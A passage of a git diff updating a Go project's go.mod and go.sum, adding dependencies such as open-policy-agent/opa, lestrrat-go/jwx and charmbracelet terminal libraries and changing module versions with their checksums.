+ github.com/agnivade/levenshtein v1.2.1 // indirect
+ github.com/aymanbagabas/go-osc52/v2 v2.0.1 // indirect
+ github.com/cespare/xxhash/v2 v2.3.0 // indirect
+ github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc // indirect
+ github.com/charmbracelet/x/ansi v0.8.0 // indirect
+ github.com/charmbracelet/x/cellbuf v0.0.13 // indirect
+ github.com/charmbracelet/x/term v0.2.1 // indirect
+ github.com/cli/safeexec v1.0.0 // indirect
+ github.com/cli/shurcooL-graphql v0.0.4 // indirect
+ github.com/decred/dcrd/dcrec/secp256k1/v4 v4.4.0 // indirect
+ github.com/gobwas/glob v0.2.3 // indirect
+ github.com/goccy/go-json v0.10.5 // indirect
github.com/google/go-querystring v1.2.0 // indirect
github.com/hashicorp/go-cleanhttp v0.5.2 // indirect
github.com/hashicorp/go-retryablehttp v0.7.8 // indirect
+ github.com/henvic/httpretty v0.0.6 // indirect
github.com/inconshreveable/mousetrap v1.1.0 // indirect
github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 // indirect
- github.com/kr/pretty v0.3.1 // indirect
+ github.com/lestrrat-go/blackmagic v1.0.4 // indirect
+ github.com/lestrrat-go/dsig v1.0.0 // indirect
+ github.com/lestrrat-go/dsig-secp256k1 v1.0.0 // indirect
+ github.com/lestrrat-go/httpcc v1.0.1 // indirect
+ github.com/lestrrat-go/httprc/v3 v3.0.2 // indirect
+ github.com/lestrrat-go/jwx/v3 v3.0.13 // indirect
+ github.com/lestrrat-go/option/v2 v2.0.0 // indirect
+ github.com/lucasb-eyer/go-colorful v1.2.0 // indirect
github.com/matryer/is v1.4.1 // indirect
github.com/mattn/go-colorable v0.1.13 // indirect
github.com/mattn/go-isatty v0.0.20 // indirect
- github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b // indirect
+ github.com/mattn/go-runewidth v0.0.16 // indirect
+ github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d // indirect
+ github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db // indirect
+ github.com/muesli/termenv v0.16.0 // indirect
github.com/pkg/errors v0.9.1 // indirect
- github.com/rogpeppe/go-internal v1.14.1 // indirect
- github.com/spf13/pflag v1.0.5 // indirect
+ github.com/rcrowley/go-metrics v0.0.0-20250401214520-65e299d6c5c9 // indirect
+ github.com/rivo/uniseg v0.4.7 // indirect
+ github.com/segmentio/asm v1.2.1 // indirect
+ github.com/spf13/pflag v1.0.10 // indirect
+ github.com/tchap/go-patricia/v2 v2.3.3 // indirect
+ github.com/thlib/go-timezone-local v0.0.0-20210907160436-ef149e42d28e // indirect
+ github.com/valyala/fastjson v1.6.7 // indirect
+ github.com/vektah/gqlparser/v2 v2.5.32 // indirect
+ github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb // indirect
+ github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 // indirect
+ github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect
+ github.com/yashtewari/glob-intersection v0.2.0 // indirect
+ go.yaml.in/yaml/v2 v2.4.2 // indirect
+ go.yaml.in/yaml/v3 v3.0.4 // indirect
+ golang.org/x/crypto v0.48.0 // indirect
golang.org/x/oauth2 v0.34.0 // indirect
- golang.org/x/sys v0.43.0 // indirect
- golang.org/x/text v0.32.0 // indirect
- golang.org/x/time v0.14.0 // indirect
- gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c // indirect
+ golang.org/x/sync v0.20.0 // indirect
+ golang.org/x/sys v0.41.0 // indirect
+ golang.org/x/text v0.34.0 // indirect
+ golang.org/x/time v0.15.0 // indirect
+ gopkg.in/yaml.v3 v3.0.1 // indirect
+ sigs.k8s.io/yaml v1.6.0 // indirect
)
diff --git a/go.sum b/go.sum
index ee1ea03..99ddc06 100644
--- a/go.sum
+++ b/go.sum
@@ -4,15 +4,75 @@ github.com/IGLOU-EU/go-wildcard/v2 v2.1.0 h1:WFqyYAuIYLJ6mHZ4rp/bYXiR4E1IvXW4+zI
github.com/IGLOU-EU/go-wildcard/v2 v2.1.0/go.mod h1:/sUMQ5dk2owR0ZcjRI/4AZ+bUFF5DxGCQrDMNBXUf5o=
github.com/Netflix/go-expect v0.0.0-20220104043353-73e0943537d2 h1:+vx7roKuyA63nhn5WAunQHLTznkw5W8b1Xc0dNjp83s=
github.com/Netflix/go-expect v0.0.0-20220104043353-73e0943537d2/go.mod h1:HBCaDeC1lPdgDeDbhX8XFpy1jqjK0IBG8W5K+xYqA0w=
-github.com/cpuguy83/go-md2man/v2 v2.0.4/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o=
-github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E=
+github.com/agnivade/levenshtein v1.2.1 h1:EHBY3UOn1gwdy/VbFwgo4cxecRznFk7fKWN1KOX7eoM=
+github.com/agnivade/levenshtein v1.2.1/go.mod h1:QVVI16kDrtSuwcpd0p1+xMC6Z/VfhtCyDIjcwga4/DU=
+github.com/andreyvit/diff v0.0.0-20170406064948-c7f18ee00883 h1:bvNMNQO63//z+xNgfBlViaCIJKLlCJ6/fmUseuG0wVQ=
+github.com/andreyvit/diff v0.0.0-20170406064948-c7f18ee00883/go.mod h1:rCTlJbsFo29Kk6CurOXKm700vrz8f0KW0JNfpkRJY/8=
+github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0 h1:jfIu9sQUG6Ig+0+Ap1h4unLjW6YQJpKZVmUzxsD4E/Q=
+github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0/go.mod h1:t2tdKJDJF9BV14lnkjHmOQgcvEKgtqs5a1N3LNdJhGE=
+github.com/aymanbagabas/go-osc52/v2 v2.0.1 h1:HwpRHbFMcZLEVr42D4p7XBqjyuxQH5SMiErDT4WkJ2k=
+github.com/aymanbagabas/go-osc52/v2 v2.0.1/go.mod h1:uYgXzlJ7ZpABp8OJ+exZzJJhRNQ2ASbcXHWsFqH8hp8=
+github.com/aymanbagabas/go-udiff v0.2.0 h1:TK0fH4MteXUDspT88n8CKzvK0X9O2xu9yQjWpi6yML8=
+github.com/aymanbagabas/go-udiff v0.2.0/go.mod h1:RE4Ex0qsGkTAJoQdQQCA0uG+nAzJO/pI/QwceO5fgrA=
+github.com/beorn7/perks v1.0.1 h1:VlbKKnNfV8bJzeqoa4cOKqO6bYr3WgKZxO8Z16+hsOM=
+github.com/beorn7/perks v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw=
+github.com/bytecodealliance/wasmtime-go/v39 v39.0.1 h1:RibaT47yiyCRxMOj/l2cvL8cWiWBSqDXHyqsa9sGcCE=
+github.com/bytecodealliance/wasmtime-go/v39 v39.0.1/go.mod h1:miR4NYIEBXeDNamZIzpskhJ0z/p8al+lwMWylQ/ZJb4=
+github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs=
+github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
+github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc h1:4pZI35227imm7yK2bGPcfpFEmuY1gc2YSTShr4iJBfs=
+github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc/go.mod h1:X4/0JoqgTIPSFcRA/P6INZzIuyqdFY5rm8tb41s9okk=
+github.com/charmbracelet/lipgloss v1.1.1-0.20250319133953-166f707985bc h1:nFRtCfZu/zkltd2lsLUPlVNv3ej/Atod9hcdbRZtlys=
+github.com/charmbracelet/lipgloss v1.1.1-0.20250319133953-166f707985bc/go.mod h1:aKC/t2arECF6rNOnaKaVU6y4t4ZeHQzqfxedE/VkVhA=
+github.com/charmbracelet/x/ansi v0.8.0 h1:9GTq3xq9caJW8ZrBTe0LIe2fvfLR/bYXKTx2llXn7xE=
+github.com/charmbracelet/x/ansi v0.8.0/go.mod h1:wdYl/ONOLHLIVmQaxbIYEC/cRKOQyjTkowiI4blgS9Q=
+github.com/charmbracelet/x/cellbuf v0.0.13 h1:/KBBKHuVRbq1lYx5BzEHBAFBP8VcQzJejZ/IA3iR28k=
+github.com/charmbracelet/x/cellbuf v0.0.13/go.mod h1:xe0nKWGd3eJgtqZRaN9RjMtK7xUYchjzPr7q6kcvCCs=
+github.com/charmbracelet/x/exp/golden v0.0.0-20240806155701-69247e0abc2a h1:G99klV19u0QnhiizODirwVksQB91TJKV/UaTnACcG30=
+github.com/charmbracelet/x/exp/golden v0.0.0-20240806155701-69247e0abc2a/go.mod h1:wDlXFlCrmJ8J+swcL/MnGUuYnqgQdW9rhSD61oNMb6U=
+github.com/charmbracelet/x/term v0.2.1 h1:AQeHeLZ1OqSXhrAWpYUtZyX1T3zVxfpZuEQMIQaGIAQ=
+github.com/charmbracelet/x/term v0.2.1/go.mod h1:oQ4enTYFV7QN4m0i9mzHrViD7TQKvNEEkHUMCmsxdUg=
+github.com/chengxilo/virtualterm v1.0.4 h1:Z6IpERbRVlfB8WkOmtbHiDbBANU7cimRIof7mk9/PwM=
+github.com/chengxilo/virtualterm v1.0.4/go.mod h1:DyxxBZz/x1iqJjFxTFcr6/x+jSpqN0iwWCOK1q10rlY=
+github.com/cli/go-gh/v2 v2.13.0 h1:jEHZu/VPVoIJkciK3pzZd3rbT8J90swsK5Ui4ewH1ys=
+github.com/cli/go-gh/v2 v2.13.0/go.mod h1:Us/NbQ8VNM0fdaILgoXSz6PKkV5PWaEzkJdc9vR2geM=
+github.com/cli/safeexec v1.0.0 h1:0VngyaIyqACHdcMNWfo6+KdUYnqEr2Sg+bSP1pdF+dI=
+github.com/cli/safeexec v1.0.0/go.mod h1:Z/D4tTN8Vs5gXYHDCbaM1S/anmEDnJb1iW0+EJ5zx3Q=
+github.com/cli/shurcooL-graphql v0.0.4 h1:6MogPnQJLjKkaXPyGqPRXOI2qCsQdqNfUY1QSJu2GuY=
+github.com/cli/shurcooL-graphql v0.0.4/go.mod h1:3waN4u02FiZivIV+p1y4d0Jo1jc6BViMA73C+sZo2fk=
+github.com/cpuguy83/go-md2man/v2 v2.0.6/go.mod h1:oOW0eioCTA6cOiMLiUPZOpcVxMig6NIQQ7OS05n1F4g=
github.com/creack/pty v1.1.17 h1:QeVUsEDNrLBW4tMgZHvxy18sKtr6VI492kBhUfhDJNI=
github.com/creack/pty v1.1.17/go.mod h1:MOBLtS5ELjhRRrroQr9kyvTxUAFNvYEK993ew/Vr4O4=
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
-github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc h1:U9qPSI2PIWSS1VwoXQT9A3Wy9MM3WgvqSxFWenqJduM=
+github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/decred/dcrd/dcrec/secp256k1/v4 v4.4.0 h1:NMZiJj8QnKe1LgsbDayM4UoHwbvwDRwnI3hwNaAHRnc=
+github.com/decred/dcrd/dcrec/secp256k1/v4 v4.4.0/go.mod h1:ZXNYxsqcloTdSy/rNShjYzMhyjf0LaoftYK0p+A3h40=
+github.com/dgraph-io/badger/v4 v4.9.1 h1:DocZXZkg5JJHJPtUErA0ibyHxOVUDVoXLSCV6t8NC8w=
+github.com/dgraph-io/badger/v4 v4.9.1/go.mod h1:5/MEx97uzdPUHR4KtkNt8asfI2T4JiEiQlV7kWUo8c0=
+github.com/dgraph-io/ristretto/v2 v2.2.0 h1:bkY3XzJcXoMuELV8F+vS8kzNgicwQFAaGINAEJdWGOM=
+github.com/dgraph-io/ristretto/v2 v2.2.0/go.mod h1:RZrm63UmcBAaYWC1DotLYBmTvgkrs0+XhBd7Npn7/zI=
+github.com/dgryski/trifles v0.0.0-20230903005119-f50d829f2e54 h1:SG7nF6SRlWhcT7cNTs5R6Hk4V2lcmLz2NsG2VnInyNo=
+github.com/dgryski/trifles v0.0.0-20230903005119-f50d829f2e54/go.mod h1:if7Fbed8SFyPtHLHbg49SI7NAdJiC5WIA09pe59rfAA=
+github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY=
+github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto=
github.com/fatih/color v1.16.0 h1:zmkK9Ngbjj+K0yRhTVONQh1p/HknKYSlNT+vZCzyokM=
github.com/fatih/color v1.16.0/go.mod h1:fL2Sau1YI5c0pdGEVCbKQbLXB6edEj1ZgiY4NijnWvE=
+github.com/fortytw2/leaktest v1.3.0 h1:u8491cBMTQ8ft8aeV+adlcytMZylmA5nnwwkRZjI8vw=
+github.com/fortytw2/leaktest v1.3.0/go.mod h1:jDsjWgpAGjm2CA7WthBh/CdZYEPF31XHquHwclZch5g=
+github.com/foxcpp/go-mockdns v1.2.0 h1:omK3OrHRD1IWJz1FuFBCFquhXslXoF17OvBS6JPzZF0=
+github.com/foxcpp/go-mockdns v1.2.0/go.mod h1:IhLeSFGed3mJIAXPH2aiRQB+kqz7oqu8ld2qVbOu7Wk=
+github.com/go-logr/logr v1.4.3 h1:CjnDlHq8ikf6E492q6eKboGOC0T8CDaOvkHCIg8idEI=
+github.com/go-logr/logr v1.4.3/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY=
+github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag=
+github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE=
+github.com/gobwas/glob v0.2.3 h1:A4xDbljILXROh+kObIiy5kIaPYD8e96x1tgBhUI5J+Y=
+github.com/gobwas/glob v0.2.3/go.mod h1:d3Ez4x06l9bZtSvzIay5+Yzi0fmZzPgnTbPcKjJAkT8=
+github.com/goccy/go-json v0.10.5 h1:Fq85nIqj+gXn/S5ahsiTlK3TmC85qgirsdTP/+DeaC4=
+github.com/goccy/go-json v0.10.5/go.mod h1:oq7eo15ShAhp70Anwd5lgX2pLfOS3QCiwU/PULtXL6M=
+github.com/google/flatbuffers v25.2.10+incompatible h1:F3vclr7C3HpB1k9mxCGRMXq6FdUalZ6H/pNX4FP1v0Q=
+github.com/google/flatbuffers v25.2.10+incompatible/go.mod h1:1AeVuKshWv4vARoZatz6mlQ0JxURH0Kv5+zNeJKJCa8=
github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY=
github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8=
github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU=
@@ -20,29 +80,46 @@ github.com/google/go-querystring v1.2.0 h1:yhqkPbu2/OH+V9BfpCVPZkNmUXhb2gBxJArfh
github.com/google/go-querystring v1.2.0/go.mod h1:8IFJqpSRITyJ8QhQ13bmbeMBDfmeEJZD5A0egEOmkqU=
github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=
github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
-github.com/graph-gophers/graphql-go v1.9.0 h1:yu0ucKHLc5qGpRwLYKIWtr9bOoxovkWasuBrPQwlHls=
-github.com/graph-gophers/graphql-go v1.9.0/go.mod h1:23olKZ7duEvHlF/2ELEoSZaY1aNPfShjP782SOoNTyM=
+github.com/h2non/parth v0.0.0-20190131123155-b4df798d6542 h1:2VTzZjLZBgl62/EtslCrtky5vbi9dd7HrQPQIx6wqiw=
+github.com/h2non/parth v0.0.0-20190131123155-b4df798d6542/go.mod h1:Ow0tF8D4Kplbc8s8sSb3V2oUCygFHVp8gC3Dn6U4MNI=
github.com/hashicorp/go-cleanhttp v0.5.2 h1:035FKYIWjmULyFRBKPs8TBQoi0x6d9G4xc9neXJWAZQ=
github.com/hashicorp/go-cleanhttp v0.5.2/go.mod h1:kO/YDlP8L1346E6Sodw+PrpBSV4/SoxCXGY6BqNFT48=
github.com/hashicorp/go-hclog v1.6.3 h1:Qr2kF+eVWjTiYmU7Y31tYlP1h0q/X3Nl3tPGdaB11/k=
github.com/hashicorp/go-hclog v1.6.3/go.mod h1:W4Qnvbt70Wk/zYJryRzDRU/4r0kIg0PVHBcfoyhpF5M=
github.com/hashicorp/go-retryablehttp v0.7.8 h1:ylXZWnqa7Lhqpk0L1P1LzDtGcCR0rPVUrx/c8Unxc48=
github.com/hashicorp/go-retryablehttp v0.7.8/go.mod h1:rjiScheydd+CxvumBsIrFKlx3iS0jrZ7LvzFGFmuKbw=
-github.com/hashicorp/go-version v1.9.0 h1:CeOIz6k+LoN3qX9Z0tyQrPtiB1DFYRPfCIBtaXPSCnA=
-github.com/hashicorp/go-version v1.9.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
+github.com/hashicorp/go-version v1.8.0 h1:KAkNb1HAiZd1ukkxDFGmokVZe1Xy9HG6NUp+bPle2i4=
+github.com/hashicorp/go-version v1.8.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
+github.com/henvic/httpretty v0.0.6 h1:JdzGzKZBajBfnvlMALXXMVQWxWMF/ofTy8C3/OSUTxs=
+github.com/henvic/httpretty v0.0.6/go.mod h1:X38wLjWXHkXT7r2+uK8LjCMne9rsuNaBLJ+5cU2/Pmo=
github.com/hinshun/vt10x v0.0.0-20220119200601-820417d04eec h1:qv2VnGeEQHchGaZ/u7lxST/RaJw+cv273q79D81Xbog=
github.com/hinshun/vt10x v0.0.0-20220119200601-820417d04eec/go.mod h1:Q48J4R4DvxnHolD5P8pOtXigYlRuPLGl6moFx3ulM68=
github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=
github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=
github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 h1:Z9n2FFNUXsshfwJMBgNA0RU6/i7WVaAegv3PtuIHPMs=
github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51/go.mod h1:CzGEWj7cYgsdH8dAjBGEr58BoE7ScuLd+fwFZ44+/x8=
-github.com/kr/pretty v0.2.1/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI=
+github.com/klauspost/compress v1.18.2 h1:iiPHWW0YrcFgpBYhsA6D1+fqHssJscY/Tm/y2Uqnapk=
+github.com/klauspost/compress v1.18.2/go.mod h1:R0h/fSBs8DE4ENlcrlib3PsXS61voFxhIs2DeRhCvJ4=
github.com/kr/pretty v0.3.1 h1:flRD4NNwYAUpkphVc1HcthR4KEIFJ65n8Mw5qdRn3LE=
github.com/kr/pretty v0.3.1/go.mod h1:hoEshYVHaxMs3cyo3Yncou5ZscifuDolrwPKZanG3xk=
-github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
-github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY=
github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE=
+github.com/lestrrat-go/blackmagic v1.0.4 h1:IwQibdnf8l2KoO+qC3uT4OaTWsW7tuRQXy9TRN9QanA=
+github.com/lestrrat-go/blackmagic v1.0.4/go.mod h1:6AWFyKNNj0zEXQYfTMPfZrAXUWUfTIZ5ECEUEJaijtw=
+github.com/lestrrat-go/dsig v1.0.0 h1:OE09s2r9Z81kxzJYRn07TFM9XA4akrUdoMwr0L8xj38=
+github.com/lestrrat-go/dsig v1.0.0/go.mod h1:dEgoOYYEJvW6XGbLasr8TFcAxoWrKlbQvmJgCR0qkDo=
+github.com/lestrrat-go/dsig-secp256k1 v1.0.0 h1:JpDe4Aybfl0soBvoVwjqDbp+9S1Y2OM7gcrVVMFPOzY=
+github.com/lestrrat-go/dsig-secp256k1 v1.0.0/go.mod h1:CxUgAhssb8FToqbL8NjSPoGQlnO4w3LG1P0qPWQm/NU=
+github.com/lestrrat-go/httpcc v1.0.1 h1:ydWCStUeJLkpYyjLDHihupbn2tYmZ7m22BGkcvZZrIE=
+github.com/lestrrat-go/httpcc v1.0.1/go.mod h1:qiltp3Mt56+55GPVCbTdM9MlqhvzyuL6W/NMDA8vA5E=
+github.com/lestrrat-go/httprc/v3 v3.0.2 h1:7u4HUaD0NQbf2/n5+fyp+T10hNCsAnwKfqn4A4Baif0=
+github.com/lestrrat-go/httprc/v3 v3.0.2/go.mod h1:mSMtkZW92Z98M5YoNNztbRGxbXHql7tSitCvaxvo9l0=
+github.com/lestrrat-go/jwx/v3 v3.0.13 h1:AdHKiPIYeCSnOJtvdpipPg/0SuFh9rdkN+HF3O0VdSk=
+github.com/lestrrat-go/jwx/v3 v3.0.13/go.mod h1:2m0PV1A9tM4b/jVLMx8rh6rBl7F6WGb3EG2hufN9OQU=
+github.com/lestrrat-go/option/v2 v2.0.0 h1:XxrcaJESE1fokHy3FpaQ/cXW8ZsIdWcdFzzLOcID3Ss=
+github.com/lestrrat-go/option/v2 v2.0.0/go.mod h1:oSySsmzMoR0iRzCDCaUfsCzxQHUEuhOViQObyy7S6Vg=
+github.com/lucasb-eyer/go-colorful v1.2.0 h1:1nnpGOrhyZZuNyfu1QjKiUICQ74+3FNCN69Aj6K7nkY=
+github.com/lucasb-eyer/go-colorful v1.2.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0=
github.com/machinebox/graphql v0.2.2 h1:dWKpJligYKhYKO5A2gvNhkJdQMNZeChZYyBbrZkBZfo=
github.com/machinebox/graphql v0.2.2/go.mod h1:F+kbVMHuwrQ5tYgU9JXlnskM8nOaFxCAEolaQybkjWA=
github.com/matryer/is v1.4.1 h1:55ehd8zaGABKLXQUe2awZ99BD/PTc2ls+KV/dXphgEQ=
@@ -54,71 +131,151 @@ github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hd
github.com/mattn/go-isatty v0.0.16/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM=
github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
-github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b h1:j7+1HpAFS1zy5+Q4qx1fWh90gTKwiN4QCGoY9TWyyO4=
+github.com/mattn/go-runewidth v0.0.16 h1:E5ScNMtiwvlvB5paMFdw9p4kSQzbXFikJ5SQO6TULQc=
+github.com/mattn/go-runewidth v0.0.16/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w=
github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE=
-github.com/pkg/diff v0.0.0-20210226163009-20ebb0f2a09e/go.mod h1:pJLUxLENpZxwdsKMEsNbx1VGcRFpLqf3715MtcvvzbA=
+github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d h1:5PJl274Y63IEHC+7izoQE9x6ikvDFZS2mDVS3drnohI=
+github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE=
+github.com/miekg/dns v1.1.57 h1:Jzi7ApEIzwEPLHWRcafCN9LZSBbqQpxjt/wpgvg7wcM=
+github.com/miekg/dns v1.1.57/go.mod h1:uqRjCRUuEAA6qsOiJvDd+CFo/vW+y5WR6SNmHE55hZk=
+github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db h1:62I3jR2EmQ4l5rM/4FEfDWcRD+abF5XlKShorW5LRoQ=
+github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db/go.mod h1:l0dey0ia/Uv7NcFFVbCLtqEBQbrT4OCwCSKTEv6enCw=
+github.com/muesli/termenv v0.16.0 h1:S5AlUN9dENB57rsbnkPyfdGuWIlkmzJjbFf0Tf5FWUc=
+github.com/muesli/termenv v0.16.0/go.mod h1:ZRfOIKPFDYQoDFF4Olj7/QJbW60Ol/kL1pU3VfY/Cnk=
+github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 h1:C3w9PqII01/Oq1c1nUAm88MOHcQC9l5mIlSMApZMrHA=
+github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822/go.mod h1:+n7T8mK8HuQTcFwEeznm/DIxMOiR9yIdICNftLE1DvQ=
+github.com/open-policy-agent/opa v1.15.2 h1:dS9q+0Yvruq/VNvWJc5qCvCchn715OWc3HLHXn/UCCc=
+github.com/open-policy-agent/opa v1.15.2/go.mod h1:c6SN+7jSsUcKJLQc5P4yhwx8YYDRbjpAiGkBOTqxaa4=
github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=
github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
-github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
-github.com/rogpeppe/go-internal v1.9.0/go.mod h1:WtVeX8xhTBvf0smdhujwtBcq4Qrzq/fJaraNFVN+nFs=
+github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRIccs7FGNTlIRMkT8wgtp5eCXdBlqhYGL6U=
+github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/prometheus/client_golang v1.23.2 h1:Je96obch5RDVy3FDMndoUsjAhG5Edi49h0RJWRi/o0o=
+github.com/prometheus/client_golang v1.23.2/go.mod h1:Tb1a6LWHB3/SPIzCoaDXI4I8UHKeFTEQ1YCr+0Gyqmg=
+github.com/prometheus/client_model v0.6.2 h1:oBsgwpGs7iVziMvrGhE53c/GrLUsZdHnqNwqPLxwZyk=
+github.com/prometheus/client_model v0.6.2/go.mod h1:y3m2F6Gdpfy6Ut/GBsUqTWZqCUvMVzSfMLjcu6wAwpE=
+github.com/prometheus/common v0.66.1 h1:h5E0h5/Y8niHc5DlaLlWLArTQI7tMrsfQjHV+d9ZoGs=
+github.com/prometheus/common v0.66.1/go.mod h1:gcaUsgf3KfRSwHY4dIMXLPV0K/Wg1oZ8+SbZk/HH/dA=
+github.com/prometheus/procfs v0.17.0 h1:FuLQ+05u4ZI+SS/w9+BWEM2TXiHKsUQ9TADiRH7DuK0=
+github.com/prometheus/procfs v0.17.0/go.mod h1:oPQLaDAMRbA+u8H5Pbfq+dl3VDAvHxMUOVhe0wYB2zw=
+github.com/rcrowley/go-metrics v0.0.0-20250401214520-65e299d6c5c9 h1:bsUq1dX0N8AOIL7EB/X911+m4EHsnWEHeJ0c+3TTBrg=
+github.com/rcrowley/go-metrics v0.0.0-20250401214520-65e299d6c5c9/go.mod h1:bCqnVzQkZxMG4s8nGwiZ5l3QUCyqpo9Y+/ZMZ9VjZe4=
+github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc=
+github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ=
+github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88=
github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ=
github.com/rogpeppe/go-internal v1.14.1/go.mod h1:MaRKkUm5W0goXpeCfT7UZI6fk/L7L7so1lCWt35ZSgc=
github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=
